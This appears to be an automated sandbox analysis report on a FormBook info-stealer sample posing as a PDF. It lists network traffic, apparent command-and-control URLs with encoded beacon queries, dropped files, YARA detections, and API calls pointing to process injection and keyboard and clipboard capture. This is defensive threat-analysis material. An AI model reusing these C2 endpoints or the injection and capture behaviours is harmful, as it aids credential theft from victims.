          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: aruba-proxyDate: Thu, 28 May 2020 03:55:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingPragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.elizavetakalinina.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=376rpn6oase94253u3k1ot3ka7; path=/Data Raw: 39 32 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 63 65 6e 74 65 72 20 68 74 6d 6c 5f 62 6f 74 74 6f 6d 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61 72 5f 61 63 74 69 76 65 20 68 74 6d 6c 5f 6d 6f 62 69 6c 65 5f 6d 65 6e 75 5f 70 68 6f 6e 65 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 65 61 72 63 68 69 63 6f 6e 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 75 6e 73 74 69 63 6b 5f 74 6f 70 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 72 65 74 63 68 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 61 76 2d 6f 76 65 72 6c 61 79 2d 66 75 6c 6c 20 68 74 6d 6c 5f 61 76 2d 73 75 62 6d 65 6e 75 2d 6e 6f 63 6c 6f 6e 65 20 61 76 2d 6e 6f 2d 70 72 65 76 69 65 77 20 68 74 6d 6c 5f 74 65 78 74 5f 6d 65 6e 75 5f 61 63 74 69 76 65 20 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 0a 0a 3c 21 2d 2d 20 6d 6f 62 69 6c 65 20 73 65 74 74 69 6e 67 20 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 21 2d 2d 20 53 63 72 69 70 74 73 2f 43 53 53 20 61 6e 64 20 77 70 5f 68 65 61 64 20 68 6f 6f 6b 20 2d 2d 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 45 6c 69 7a 61 76 65 74 61 20 4b 61 6c 69 6e 69 6e 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 6
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.1167784770.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://ns.microsoftom/photo/1.2/tD
          Source: explorer.exe, 00000003.00000002.1791418593.00000000030D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmpString found in binary or memory: http://www.elizavetakalinina.com
          Source: chkdsk.exe, 00000004.00000002.1792417186.0000000005E09000.00000004.00000001.sdmpString found in binary or memory: http://www.elizavetakalinina.com/6dk/
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.1189475705.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: chkdsk.exe, 00000004.00000002.1792598460.00000000060FF000.00000004.00000001.sdmpString found in binary or memory: https://www.sweetandsunny.com/6dk/?4hG=le9ZFLPtKd8NP4oRc571WO4/dkAOUpI85HqTFH

          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_00420B44 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00420B44
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0043E138 GetKeyboardState,0_2_0043E138

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\03P50U3A\03Plogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1571990365.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1214499431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1571894133.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1785909962.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_00462D62 NtCreateSection,0_2_00462D62
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0045F1A1 NtMapViewOfSection,0_2_0045F1A1
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0045BD14 NtdllDefWindowProc_A,0_2_0045BD14
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0045FE23 VirtualAlloc,CreateProcessW,NtUnmapViewOfSection,0_2_0045FE23
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0045C4BC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0045C4BC
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_0045C56C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0045C56C
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_00450FF8 GetSubMenu,SaveDC,RestoreDC,7311B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00450FF8
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_004410B4 NtdllDefWindowProc_A,GetCapture,0_2_004410B4
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 0_2_00429B28 NtdllDefWindowProc_A,0_2_00429B28
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00419850 NtCreateFile,2_2_00419850
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00419900 NtReadFile,2_2_00419900
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00419980 NtClose,2_2_00419980
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00419A30 NtAllocateVirtualMemory,2_2_00419A30
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_004198FA NtReadFile,2_2_004198FA
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00419AAA NtAllocateVirtualMemory,2_2_00419AAA
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A2D0 NtClose,LdrInitializeThunk,2_2_00A8A2D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A240 NtReadFile,LdrInitializeThunk,2_2_00A8A240
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A8A3E0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A8A360
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A8A4A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A480 NtMapViewOfSection,LdrInitializeThunk,2_2_00A8A480
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A410 NtQueryInformationToken,LdrInitializeThunk,2_2_00A8A410
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A8A5F0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A560 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A8A560
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A540 NtDelayExecution,LdrInitializeThunk,2_2_00A8A540
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A6A0 NtCreateSection,LdrInitializeThunk,2_2_00A8A6A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A8A610
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A720 NtResumeThread,LdrInitializeThunk,2_2_00A8A720
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A8A700
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A750 NtCreateFile,LdrInitializeThunk,2_2_00A8A750
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8B0B0 NtGetContextThread,2_2_00A8B0B0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A800 NtSetValueKey,2_2_00A8A800
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A2F0 NtQueryInformationFile,2_2_00A8A2F0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A220 NtWaitForSingleObject,2_2_00A8A220
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8BA30 NtSetContextThread,2_2_00A8BA30
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A260 NtWriteFile,2_2_00A8A260
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A3D0 NtCreateKey,2_2_00A8A3D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A310 NtEnumerateValueKey,2_2_00A8A310
